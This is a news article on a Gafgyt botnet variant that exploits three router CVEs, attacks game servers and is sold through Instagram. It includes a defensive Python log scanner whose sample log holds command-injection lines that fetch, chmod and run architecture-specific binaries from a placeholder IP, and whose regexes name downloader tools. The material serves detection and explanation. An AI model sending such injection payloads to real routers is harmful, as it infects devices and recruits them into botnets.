32,000+ WiFi Routers Potentially Exposed to New Gafgyt Variant

Researchers detect an updated Gafgyt variant that targets flaws in small office and home wireless routers from Zyxel, Huawei, and Realtek.

A newly discovered variant of the Gafgyt Internet of Things (IoT) botnet is attempting to infect connected devices, specifically small office and home wireless routers from brands that include Zyxel, Huawei, and Realtek.

Gafgyt was first detected in 2014. Since then, it has become known for large-scale distributed denial-of-service attacks, and its many variants have grown to target a range of businesses across industries. Starting in 2016, researchers with Unit 42 (formerly Zingbox security research) noticed wireless routers are among the most common IoT devices in all organizations and prime targets for IoT botnets.

When a botnet strikes, it can degrade the production network and reputation of a company's IP addresses. Botnets gain access to connected devices by using exploits instead of attempting to log in via unsecured services. As a result, a botnet can more easily spread through IoT devices even if a business's admins have disabled unsecured services and use strong login credentials.

The new Gafgyt variant, detected in September, is a competitor of the JenX botnet. JenX also uses remote code execution exploits to compromise devices and recruit them into a botnet that launches denial-of-service (DoS) attacks on gaming servers, especially those running the Valve Source engine. This Gafgyt variant targets vulnerabilities in three wireless router models, two of which it has in common with JenX. The two share CVE-2017-17215 (in Huawei HG532) and CVE-2014-8361 (in Realtek's RTL81XX chipset). CVE-2017-18368 (in Zyxel P660HN-T1A) is a new addition to Gafgyt.

"Gafgyt was developed off JenX botnet code, which just highlights how much interest there is when it comes to building botnets within that community," says Jen Miller-Osborn, deputy director of threat intelligence at Unit 42. This evolution of Gafgyt indicates a dedicated group of people is working to update these botnets and make them more dangerous, she notes. Most of the time when a botnet is updated, it typically means a new CVE has been added to its lineup.

"The difference with this one is the developers added a new vulnerability to it that wasn't present in the previous one," Miller-Osborn says. "That added to its potential reach." Shodan scans indicate at least 32,000 Wi-Fi routers are potentially vulnerable to these exploits.

Gafgyt uses three "scanners" in an attempt to exploit known remote code execution bugs in the aforementioned routers. These scanners replace the typical "dictionary" attacks employed by other IoT botnets, which typically aim to breach connected devices through unsecured services.

The exploits are designed to work as binary droppers, which pull a corresponding binary from a malicious server depending on the type of device it's trying to infect. The new Gafgyt variant is capable of conducting different types of DoS attacks at the same time, depending on the commands it receives from the command-and-control server, Unit 42 researchers say in a blog post on the findings.
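The three exploits differ, but the dropper stage they carry shares one shape: a shell break-out inside an HTTP parameter, a downloader fetching an architecture-specific binary, and a chmod-and-execute chain. The following Python detector is an added example written for this article (it is not Unit 42's code and does not come from the researchers' blog post); it scans constructed router access-log lines for that shape and reports which CPU architecture the fetched file name suggests. The log layout, file paths and IP addresses are all constructed for the example.

```python
"""Flag dropper-style command injection in router/web access logs.

Added example (not Unit 42's code). Looks for the generic IoT dropper shape
inside HTTP request parameters: a shell break-out, then a downloader, then an
execute chain, and reports the CPU architecture the fetched binary name implies.
"""
import re
from urllib.parse import unquote_plus

# Downloader commands commonly embedded in dropper payloads.
DOWNLOADER = re.compile(r"\b(?:busybox\s+)?(?:wget|tftp|curl|ftpget)\b", re.I)
# Execute chain: chmod, running a relative binary, or staging under /tmp.
EXECUTE = re.compile(r"\bchmod\b|(?:^|[;&|`\s])\./\w|/tmp/\w", re.I)
# Shell break-out tokens that never belong in a benign host or URL field.
BREAKOUT = re.compile(r"[;|`&]|\$\(")
# Architecture hints in the fetched file name, e.g. bin.arm7, bin.mips, bin.x86.
ARCH = re.compile(r"\b(arm\w*|mips\w*|mpsl|x86\w*|i[3-6]86|ppc\w*|sh4|sparc\w*|m68k)\b", re.I)

# Constructed log layout (assumption): "<client_ip> <METHOD> <path> [<params>]".
LOG_RE = re.compile(r"^(?P<ip>\S+)\s+(?P<method>[A-Z]+)\s+(?P<path>\S+)(?:\s+(?P<params>.*))?$")

# Constructed sample lines; 192.0.2.x / 198.51.100.x / 203.0.113.x are documentation ranges.
SAMPLE_LOG = """\
192.0.2.50 POST /cgi-bin/upgrade.cgi url=$(cd /tmp;wget http://198.51.100.7/bin.arm7;chmod 777 bin.arm7;./bin.arm7)
192.0.2.51 GET /cgi-bin/log.asp host=%3Bcd+%2Ftmp%3Bwget+http%3A%2F%2F198.51.100.7%2Fbin.mips%3Bchmod+%2Bx+bin.mips%3B.%2Fbin.mips
192.0.2.52 GET /index.html
192.0.2.53 GET /cgi-bin/log.asp host=203.0.113.9
192.0.2.54 POST /cgi-bin/upgrade.cgi url=http://downloads.example/firmware.bin
"""


def parse_line(line):
    """Split one log line into its fields; parameters are URL-decoded."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["params"] = unquote_plus(rec["params"] or "")
    return rec


def classify(line):
    """Return None for a benign line, else a dict describing the suspected dropper."""
    rec = parse_line(line)
    if rec is None:
        return None
    params = rec["params"]
    # Both a break-out and a downloader are required to keep false positives low.
    if not (BREAKOUT.search(params) and DOWNLOADER.search(params)):
        return None
    arch = ARCH.search(params)
    return {
        "client": rec["ip"],
        "path": rec["path"],
        "executes": bool(EXECUTE.search(params)),
        "arch": arch.group(1).lower() if arch else None,
    }


def scan(log_text):
    """Return the list of suspected dropper hits found in a block of log text."""
    return [hit for hit in (classify(l) for l in log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Run on the constructed sample, the two injected lines are flagged (one fetching an ARM binary, one a MIPS binary) while the plain firmware URL and the well-formed host value pass, which is the distinction a router or edge-proxy log rule would need to make.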

Gafgyt Sets Sights on Gamers
One of the DoS attacks this Gafgyt variant can perform is VSE, which contains a payload to attack game servers running the Valve Source Engine. This is the engine that runs games like Half-Life, Team Fortress 2, and others. Researchers emphasize this isn't an attack on Valve, as anyone can run a server for the games on their own network. This attack targets the servers. 

With the rest of the DoS attack methods, operators are targeting other servers hosting popular games such as Fortnite, Unit 42 found. Miller-Osborn says the purpose in targeting gaming servers is mostly to be an annoyance. "They're not going to make a lot of money doing it," she adds.

While gaming servers have become popular victims, the diversity of IoT devices targeted in these attacks has grown, researchers say. There is nothing about these routers that makes them more likely to be owned by gamers; home users and small businesses are also at risk.

"Once they're compromised, they're used to do malicious activity," Miller-Osborn explains. "The routers themselves could be owned by anyone. The biggest thing, especially with all these IoT malware families, is for people to keep in mind this is probably just going to get worse."

An attack on gaming servers is one thing, she says. It's typically a DoS incident and people aren't getting hurt. However, if an attacker can effectively compromise a router, they can also move into the network and conduct more nefarious activity — for example, data theft.

These attacks highlight the fact that there are a lot of devices, especially routers, active on the Internet and vulnerable to a number of CVEs. The new Gafgyt variant, for example, targets two router vulnerabilities from 2017 and one from 2014, Miller-Osborn points out. "When it comes to routers, you don't necessarily see them getting patched," she notes. Outside the security community, few people will know when they should update their routers or if they've been hit by a botnet — unless, of course, their Internet service provider tells them.

Instagram: New Botnet Market
Cybercriminals are also finding new ways to sell botnets, researchers report. Once an activity limited to the Dark Web, the buying and selling of malware has surfaced to social networks.

In one attack analyzed, the new Gafgyt variant looks for competing botnets on the same device and tries to kill them. It does this by looking for certain keywords and binary names present in other IoT botnet variants. Researchers noticed some strings related to other IoT botnets (Mirai, Hakai, Miori, Satori), while others corresponded to Instagram usernames. The team built some fake profiles and reached out, only to find the account owners were selling botnets through their Instagram profiles.
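The researchers' observation above came from reading the strings embedded in the sample: the kill list mixes names of rival malware families with tokens that turned out to be seller handles. The following Python snippet is an added example (not Unit 42's code) of that triage step: it extracts printable strings from a constructed binary blob the way the `strings` utility does, buckets the ones that match the family names the article lists, and sets aside unrecognised name-like tokens for an analyst to look up. The blob, the token `rivalkill_x` and the handle `@example_seller` are all constructed for the example.

```python
"""Triage the kill-list strings of an IoT bot sample.

Added example (not Unit 42's code). Extracts printable ASCII runs from a binary
blob and splits them into known botnet family names and unknown name-like
tokens worth investigating.
"""
import re

# IoT botnet family names mentioned in the article, lower-case for matching.
KNOWN_FAMILIES = ("mirai", "hakai", "miori", "satori", "gafgyt", "jenx")

# Name-like token: letters, digits, underscore, dot or '@'; no path separators.
NAME_TOKEN = re.compile(r"[A-Za-z0-9_.@]+")

# Constructed stand-in for a stripped ELF sample: a fake header, a few
# NUL-terminated strings, and some non-printable filler.
SAMPLE_BLOB = (
    b"\x7fELF\x01\x01\x01\x00\x00\x00\x00\x00"
    + b"/proc/\x00/exe\x00"
    + b"mirai\x00hakai\x00Satori\x00miori\x00"
    + b"rivalkill_x\x00@example_seller\x00"
    + b"/bin/busybox\x00\x01\x02\x03"
)


def extract_strings(blob, min_len=4):
    """Return printable ASCII runs of at least min_len bytes, like `strings`."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def triage_kill_list(blob):
    """Split extracted strings into known family hits and unknown name-like tokens.

    Returns (known, unknown): known maps family -> list of matching strings
    as they appear in the sample; unknown keeps tokens in order of appearance.
    """
    known, unknown = {}, []
    for s in extract_strings(blob):
        low = s.lower()
        family = next((f for f in KNOWN_FAMILIES if f in low), None)
        if family:
            known.setdefault(family, []).append(s)
        elif NAME_TOKEN.fullmatch(s):
            unknown.append(s)
    # Paths such as /proc/ or /bin/busybox are neither: they are skipped.
    return known, unknown


if __name__ == "__main__":
    known, unknown = triage_kill_list(SAMPLE_BLOB)
    print("known families:", known)
    print("unknown tokens to investigate:", unknown)
```

The unknown bucket is the interesting output: in the article's case it was exactly those leftover tokens, not the recognised family names, that led the researchers to seller accounts on Instagram.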

(Image: Unit 42)

Attackers offered the researchers source code for botnets. Unit 42 has contacted Instagram to report these profiles; it also reported malicious sites being used to handle botnet subscriptions. It's "pretty common" for these sales to happen on social media, says Miller-Osborn, and a constant fight for social networks to take down malicious accounts.

"People want to market their devices and services, and one of the easiest ways to do that is on social media," she explains. While it makes things simple for attackers, removing the accounts is "a constant game of whack-a-mole" for social media companies.


Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial ...
